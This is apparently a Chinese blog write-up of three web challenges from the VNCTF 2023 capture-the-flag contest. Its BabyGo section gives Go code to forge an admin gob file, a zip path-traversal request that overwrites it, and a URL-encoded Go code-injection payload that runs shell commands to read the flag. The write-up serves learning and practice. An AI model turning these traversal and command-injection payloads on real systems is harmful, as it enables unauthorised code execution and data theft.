VNCTF 2023复现

最新推荐文章于 2024-07-09 15:25:42 发布
最新推荐文章于 2024-07-09 15:25:42 发布
阅读量1.1k 收藏 1
点赞数 4
分类专栏: 比赛 文章标签: web安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/129113110
版权

文章目录

象棋王子

签到题,直接在源码中找就ok。

image-20230219170613121

找到一处编码,在控制台输出。

image-20230219170654773

flag为:flag{w3lc0m3_t0_VNCTF_2023~~~}

电子木鱼

需要先理清代码逻辑。

存在三个路由。

一:/路由用来查看当前的功德数量,大于十亿后即可得到flag。

二:/reset是用来清空功德。

三:/upgrade,POST路由,用来控制功德。

image-20230219171232585

在这里可以知道各种name对应的cost。

image-20230219171319445

最主要的是这几个代码,首先是当name等于Donate和Cost时

cost=cost*quantity

然后最后设定的功德值是原值减去cost值,所以想办法让cost为负数或者quantity为负数即可让功德增加,在name等于Donate和Cost时cost初始都是整数,只能让quantity为负,想到让quantity过大然后溢出。

image-20230219171812605

成功溢出。

image-20230219171831374

flag为:flag{492cd242-6038-4a31-9bc4-1701624bf759}

BabyGo

本题为复现,当时不懂如何让ctfer.Power == “admin”。

首先也是理清一下代码逻辑,存在五个路由。

首先就是/路由。

image-20230219172214142

该路由创建了一个user.gob文件,保存到userDir目录下,然后设置了ctfer.Power的值为low。

gobFile, _ := os.Create(userDir + "user.gob")
user := User{Name: "ctfer", Path: userDir, Power: "low"}

然后就是文件上传路由。

image-20230219172448959

禁止了go和gob后缀的文件传入。

将文件传入到image-20230219172751592

userUploadDir就是/页面下中回显的目录+uploads/

所以是传入到了/tmp/05b9ef44a4225019d5e074eb8582dd2a/uploads/下。

再看一下/unzip路由:

大概作用就是去解压我们传上去的文件。

但注意其中image-20230219173107976

解压后的文件会解压到userUploadDir + c.Query(“path”)

c.Query作用是查询请求URL后面的参数。

代表我们可以控制path的值,看一下filepath.Clean的作用。

image-20230219173428571

代表了可以进行目录穿越,控制解压后的文件的传入路径。

继续看最后的/backdoor路由。

image-20230219173551967

去Open之前的user.gob文件,然后经过gob.NewDecoder操作。

image-20230219173806592

NewDecoder则是一种解码方式,也就是以二进制解码一下user.gob文件。

image-20230219173903090

如果ctfer.Power==“admin”,那么变可以继续,看一下最早是如何给ctf.Power设定值的。

image-20230219173955016

所以我们可以去利用解压文件后的目录可控来覆盖user.gob文件,修改其内容。

(16)Go OS文件基础创建、打开、读写与关闭_jadeshu的博客-CSDN博客_go os.create

学习了一下文件的操作。

//user.go
package main

import (
    "encoding/gob"
    "fmt"
    "os"
)

type User struct {
	Name  string
	Path  string
	Power string
}

func main(){
        userDir := "/tmp/05b9ef44a4225019d5e074eb8582dd2a/"  //自己docker起后的路径
        user := User{Name: "ctfer", Path: userDir, Power: "admin"}
        file, err := os.Create("./user.gob")
        if err != nil {
                fmt.Println("创建文件失败")
        return
        }
        defer file.Close()

        encoder := gob.NewEncoder(file)
        err = encoder.Encode(user)
        if err != nil {
        fmt.Println("编码错误")
        return
    } else {
        fmt.Println("编码成功")
    }
}

运行go脚本,然后得到gob文件,然后zip压缩上传。

payload:

/unzip?path=../../../tmp/c737f02c5be938c8ba38850084a0cb52/
/backdoor?pkg=os/exec"%0A"fmt")%0Afunc%09init()%7B%0Acmd:=exec.Command("/bin/sh","-c","cat${IFS}/f*")%0Ares,err:=cmd.CombinedOutput()%0Afmt.Println(err)%0Afmt.Println(res)%0A}%0Aconst(%0AMessage="fmt

image-20230219183150498

然后python脚本解码:

str = [102,108,97,103,123,102,54,52,99,98,52,56,53,45,101,98,57,53,45,52,52,50,99,45,57,99,49,54,45,55,100,102,98,48,52,97,100,102,57,57,101,125,10]

for i in range(42):
    print(chr(str[i]),end="")
f0njl
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
VNCTF 2021
煤矿路口西的博客
03-24 841
冰冰好像藏着秘密 发冰冰藏着的flag,flag格式为VNCTF{*} 得到FFT.rar 但是直接打开会提示 这个存在一个考察的点:rar伪加密 但是在实战中笔者发两个绕过的方法 1)用kali打开 2)如上图图一所示,在winrar报错的情况下,直接拖出FFT.png,也能达到解压的效果 而按出题人本身的意思,是在使用010打开的情况下: 把下图的84改成80 通过搜索得知文件名FFT为: 下面是大佬脚本: import cv2 as cv import numpy as np imp.
meshCNN分割准确率 - 使用官方代码
08-27
使用MeshCNN官方代码了其分割准确率,除了在chairs上的分割准确率偏低,其余均与论文一致 (相差不大,有高有低,大致相同)。 checkpoints文件包含: 1. 四个分割数据集的准确率testacc_log.txt以及最终生成的...
VNCTF2023 WP
qq_74710163的博客
02-25 340
其功能主要是为命令行程序(cmd.exe)提供类似于Csrss.exe进程的图形子系统等功能支持,而之前在Windows XP系统中Conhost.exe的这一功能是由Csrss.exe进程“兼职”提供的,但这被认为存在不安全因素,于是微软为了提高系统安全性在06年之后发布的Vista和Win7系统中新加入Conhost.exe进程。svchost.exe是微软Windows操作系统中的系统文件,微软官方对它的解释是:svchost.exe 是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。
VNCTF 2023 部分wp
sln_1550的博客
02-20 2233
今年逆向题目比较多,还挺顺手的,其他题目还算不难,除了babyAnti这题就AK逆向了。这题用的flutter库,研究了好久也完全找不到思路,只好放弃。后来才知道根据题目的名字,预期解就是去掉反作弊的检查,用作弊方法完成的。
记某次CTF中经典组合拳
LiBai'S BLOG
09-03 9886
经典组合拳????出题思路????解题技巧???? 总结???? 涉及的工具 ????出题思路 题目考核的是Windows环境下的redis未授权利用场景,包括基本信息收集能力以及基础漏洞利用,部分内网中的禅道环境未删除默认的phpinfo页面,同时安装有redis服务,可以获取绝对路径后写入webshell,是实战环境中多次遇到的经典技法。 ????解题技巧 Nmap扫描发开启两个端口 通过 banner 可知其中之一为 redis 另一个为禅道。 Redis 禅道 可以看到禅道存在 phpinfo
VNCTF2022 web全
CSDNDi_Di的博客
03-14 321
在data.js文件中搜索到了关键词flag,且后面附着着一个base64编码的字符串,解码试试得到flag,再将其url解码一下就行Copy。
vnctf2023 部分
weixin_57439582的博客
02-24 173
vnctf2023
2021VNCTF
unexpectedthing的博客
02-22 1010
文章目录GameV4.0newcalc0gocalc0非预期预期InterestingPHP解法1:解法2 GameV4.0 直接base64解码 newcalc0 源码 const express = require("express"); const path = require("path"); const vm2 = require("vm2"); const app = express(); app.use(express.urlencoded({ extended: true })); ap
论文-深度补全算法
03-10
1、传统深度不全算法 2、详细内容可见:https://blog.csdn.net/qq_43627520/article/details/123344654?spm=1001.2014.3001.5502 3、代码可直接运行、包含有测试用例、以及验证代码
使用numpy贝叶斯网络
10-16
在这个主题中,我们将深入探讨如何使用Python的科学计算库NumPy来贝叶斯网络的基本概念和操作。NumPy是Python生态系统中的核心库,提供了高效的多维数组对象和各种数学函数,非常适合进行数值计算。 首先,我们...
numpyxgboost算法内含数据集
10-16
本主题将深入探讨如何使用基础的NumPy库来XGBoost算法的核心概念,这对于理解其工作原理和进行性能优化非常有帮助。 XGBoost全称为“Extreme Gradient Boosting”,它是在梯度提升框架下实的一种集成学习方法...
VNCTF2023部分Web题目
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
06-27 261
VNCTF2023部分Web题目
VNCTF2023-misc方向wp
toto的博客
02-19 1642
VNCTF2023wp
vnctf2022
weixin_45805993的博客
05-28 474
eazyjava file协议读url=file:///usr/local/tomcat/webapps/ROOT/WEB-INF/classes 有用的class //HelloWorldServlet.class package servlet; import entity.User; import java.io.IOException; import java.util.Base64; import java.util.Base64.Decoder; import javax.servlet.
从SQL注入到Getshell:记一次禅道系统的渗透
dengzhasong7076的博客
03-08 1514
此过程为某站点的渗透记录,过程一波三折,但归根结底都是粗心大意造成的,不过自我认为在这个排坑的过程中也学习到了很多。 目前确认8.2 - 9.2.1存在问题 确认版本 首先可以通过接口来确认一下当前禅道的版本。 http://example.com/index.php?mode=getconfig SQL注入分析 网上之前有过一个9.1.2的orderBy函数的分析,但是没想到9.2....
自学黑客(网络安全)
最新发布
xv7676的博客
07-09 532
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。此时我们的选择也可以很多,比如CSDN,比如知乎,再比如B站,都有很多人在分享自己的学习资料,但我觉得这里存在的很大一个问题就是不连贯、不完善,大部分免费分享的教程,都是东一块西一块,前言不搭后语,学着学着就蒙了,这是我自学之后的亲身感受。当然在市面上很多网站都是PHP的开发的,所以选择PHP也是可以的。
qvd-2023-45061
12-12
qvd-2023-45061是一个软件问题的编号,一般用于跟踪和记录软件开发中的bug或者issue。在过程中,通常会按照特定的步骤或者条件重新制造出问题的发生。这个过程可以帮助开发人员更好地理解问题的本质,并且找到解决方案。 针对qvd-2023-45061的,首先需要明确该问题的详细描述,包括触发条件、错误表、以及预期结果。然后需要按照描述中的条件和步骤,尝试在相同的环境中该问题。这可能涉及到使用特定的测试数据、设置特定的配置,或者模拟一些特殊的场景。 在过程中,需要详细记录每一步的操作和观察结果,包括出的错误信息或者异常表。这些信息将有助于开发人员更快地定位问题的根本原因,并提出修方案。 qvd-2023-45061可能需要反尝试,直到可以稳定地出问题。在成功后,需要将详细的步骤以及观察到的象提交给开发团队,以便他们可以更深入地分析和处理这个问题。 总之,软件问题是一个重要的环节,它可以帮助开发团队更快地理解和解决问题,提高软件质量和用户体验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值